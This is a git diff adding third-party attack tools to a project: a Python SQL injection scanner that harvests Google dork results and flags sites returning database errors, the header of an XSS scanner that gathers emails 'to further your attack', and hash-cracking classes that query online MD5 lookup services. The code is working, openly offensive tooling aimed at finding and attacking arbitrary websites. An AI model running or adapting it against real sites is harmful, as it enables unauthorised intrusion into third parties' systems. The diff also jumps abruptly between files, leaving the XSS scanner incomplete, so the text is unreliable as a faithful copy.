urlfields.has_key(theurl)==False: urlfields[theurl]=[] + nqurl=theurl + + if getscan==1: + vulns=checkvars(theurl) + if not listempty(vulns): dispvulns(vulns,theurl) + tree=treeglob + if treedurls.has_key(nqurl): + if treedurls[nqurl].count(theurl)==0 and len(treedurls[nqurl])<=scanlimit: + treedurls[nqurl].append(theurl) + else: tree=0 + + else: treedurls[nqurl]=[theurl] + if tree==1 and level+0$XfBIJ!r~Da~_~|cBPcNSNr5~NSTqc zc;rk;76v6H+pM6iG~kQ|MYwUstE>P%66Yj{qJlCG7Bo+Skdl2|Zb(21P?T-Snu5!q zEON$KN?G!!pau8SH;1Ha#Q1mIcKB z-3PFnZMQ&VjuX)ph?NPQOqb3m2ZoZkzo&!{lUc&k{#vB{!S_zxM)2g1Ew{42W5K$z zFFcVP`6r@FQWYJMnh<#fdxS{e{GPTx{9fKxRCd=T!j4X2@+!`6mgHUD)(xr3CaNo? zFGI;I%q~d%R22rR6W-^H8qPP=&bgnTRK-&XkXM*EbSd1>@be8>l7AyinX$I|8aMNk z4NdYT`G{0JOEH78OLrIo8cc#zXlA>ZeQM!e^mldd`owh(6o}9x%DaL>BB81 zB<3k*pmP+jpt8Ljk3r0kZ<0*O^)>me*ipngHoYLvX&M28gJNi+1*bQs$lmei2aXZ$ z?b~dZM#8O*3^6nWs9N=L_j z@h***Fe?<19DV#OInukh1_J(6WbrO;#Rqr`cpW~t@Z*#4kGsJr!n5&NVm!&wC1@%Pla6f_{F=H?SNJP_^MxZfU^S<~qrb8UaPD{+zx62do zl{9TV;k}F}sVb^T)rx+AI8}EA4}ZXaFqRh=7gO?*_|E7@JN()Xzp=xWBf#T+7kTv` zmwZPiKg@ody`H^kr;<1b+<(YjHMC#@P{iTqda~71t2gF4M`X(hBKp(L)Z=;@_538E zdPDoH6*S^Vt)yXKCjl!P7QEmM*^BSV0rOOAd`H?kcykDtHSMHwn>r z;I5G+(I+08YtoV0Z*bbw*9Be)ETJ@?fU-$vtC;&y3Vl>nfv2xQoq)$sz@F=J5?6!!fYHnIUUwGP)hbjI&3&1I&O>jgaauS5aPpp}@xlBQKV3gx6dEnXcN9FEQ9Tf9p?F>~Ve;s2Al z`vne^ZT#Ejfcv+?hc z*FD+01V+6|#@9Y~$%~&~m9JZ##hs&jB@$g1<=+P4PTRaj%R}UKkm9xY1B92itC>jb zTg>T4Q2PA&bIl~7iq`&M({3@weejXq*#eHGZc|}(x|?@Fw^N_Z&FU#d+I$k?_oH;J ztxxp>gJGsfgDDFl8Y!=?SW4|Bw{wN5FIAF~zl%>!=UL#Xm*ee$Hia!T=OX9Ki@6c}XAn)-YZ{(ovSg8ql5QZfY&taJD(z2qprsSs%i1PAN z7Zl1WO6_G&S3#3qgm3<9g{Xquz*9i2YQB3N5J$`mSXFiyTB6ZIqpD4|HBq&`am21o z@l29=f_2On{~q(CT%8=Yi8YBbgC>z?2BVo?LS?WQI2AmqzQZH~R?n?!`=Rb3MxRXy z*T~yt|A0rv0#I|!g6(~Pzj8@P1-0Vk&i9S?h&oOqw^4!_MVQX_ zG%L#LZ!bt_QTCud5%Z=14bcL1i5lL@Q!8EZsVNAPoL<7~0gRK*L`_#Lw1G8=wWvi{zvDixM6%DIgcCQq-|ux~oxe3*8%Vv6EuwhWLOs7m zBe=@ptIgcI57_3@CT3+;Jl3?{W0#@F-?B&%tq>Sl$N*D8dE4oloieK~eY8yzW zwFNaw8B0Fd9F}pN`W}bDhQ)b=3;LfOW!gr(m|H+gu&uGShT0ryTcB-mJ`!eogpLKs z79ZadAm6-C|A@oB-DCfl%f9M!)7X1PYkJREP1gC@#Vle*7ZkvBvJEHGcD5{M!g?OG zXF=+XT}u+sF(c9Y?kS*6(CmjAR(h|`tf2Q(B*@y#b});W(FH?T4T;s~)sj|oR&7Z& z=G2r@Lq=^0wdB*9PE*9xzGCPpwtiyiCDuNo?IF^o!w?1E5INO71+)p8{g4p;Jx=wb zOYXbT$1Gw-Qwkv8v3n|IQ0I@zaa6?-7Ywd1^ifh9S0A&88BJMTR6LQvV^Pw2r7|3G z!Qi?+NR}9xLu8APJwUej91YL0=o}A@$vN>xthHTXX5T7Y>sBjz1Xde^>QRTRZ9(tYHmnSi}1B>whquUycA! F001d(#tHxc literal 0 HcmV?d00001 diff --git a/3rdparty/Scan.py b/3rdparty/Scan.py new file mode 100644 index 0000000..864f7bd --- /dev/null +++ b/3rdparty/Scan.py @@ -0,0 +1,63 @@ +#PYTHON SQL Injection vulnerability scanner (Powered by Google.) +#Coded by : wh4tsec +#GNU General Public License, version 2 (GPL-2.0) + + +#!/usr/bin/python +import urllib2 +import sys + +# Name of the output file ex: vul.dat +filename = "vul.dat" + +# This function gets a site url and returns 1 if its vulnurable. else, 0 will be returned +def isvul ( url ): + usock = urllib2.urlopen(url) + data = usock.read() + usock.close() + if "You have an error in your SQL" in data: + return 1; + elif "supplied argument is not a valid MySQL result resource in" in data: + return 1; + elif "Division by zero in" in data: + return 1; + elif "Microsoft JET Database" in data: + return 1; + elif "Microsoft OLE DB Provider for SQL Server" in data: + return 1; + elif "ODBC Microsoft Access Driver" in data: + return 1; + elif "Unclosed quotation mark" in data: + return 1; + elif "Microsoft OLE DB Provider for Oracle" in data: + return 1; + elif "Incorrect syntax near" in data: + return 1; + elif "SQL query failed" in data: + return 1; + return 0; +# Gets inputs from user +dork = raw_input("Enter dork: ") +ttld = raw_input("Enter tld: ") +lng = raw_input("Language: ") +results = raw_input("Results: ") + +file = open(filename,"w") +print 'WORKING', + +# Getting matched urls from google +from google import search +for url in search('inurl:' + dork, tld='' + ttld, lang='' + lng, stop=(0 + int(results))): + url = url + "'" + print '.', + if isvul(url) == 1: + file.write(url) + file.write("\r\n") + print 'BOOM!', + +file.close() + +print "\r\nDone, urls of vulnurable sites saved in 'vul.dat'" +print "coded by: wh4tsec" +print "------------------------------------------------------" +print "Credits: BeautifulSoup-2.3.0 And Google Search Python" diff --git a/3rdparty/XSSscan.py b/3rdparty/XSSscan.py new file mode 100644 index 0000000..13d4e60 --- /dev/null +++ b/3rdparty/XSSscan.py @@ -0,0 +1,326 @@ +#!/usr/bin/python +#XSS Scanner that can find hosts using a google query or search one site. +#If XSS is found it attempts to collect email addresses to further your attack +#or warn the target of the flaw. When the scan is complete +#it will print out the XSS's found and or write to file, it will find false positives +#so manually check before getting to excited. It also has verbose mode and +#you can change the alert pop-up message, check options!! +# +#Changelog v1.1: added options, verbose, write to file, change alert +#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback +#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed some user input #problems, exiting without error messages with Ctrl-C (KeyboardInterrupt) +# +#http://darkcode.ath.cx +#d3hydr8[at]gmail[dot]com + +import sys, urllib2, re, sets, random, httplib, time, socket + +def title(): + print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3" + print "\t-----------------------------------------------" + +def usage(): + title() + print "\n Usage: python XSSscan.py
', html) + + if match: + return match.group().split('b>')[1][:-2] + + return None + + +class THEKAINE: + + name = "thekaine" + url = "http://md5.thekaine.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5.thekaine.de/?hash=%s" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'

[^<]*', html) + + if match: + + match2 = search (r'not found', match.group() ) + + if match2: + return None + else: + return match.group().split('b>')[1][:-2] + + + +class TMTO: + + name = "tmto" + url = "http://www.tmto.org" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'text="[^"]+"', html) + + if match: + return decodestring(match.group().split('"')[1]) + else: + return None + + +class MD5_DB: + + name = "md5-db" + url = "http://md5-db.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5-db.de/%s.html" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + if not response: + return None + + html = None + if response: + html = response.read() + else: + return None + + match = search (r'Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden: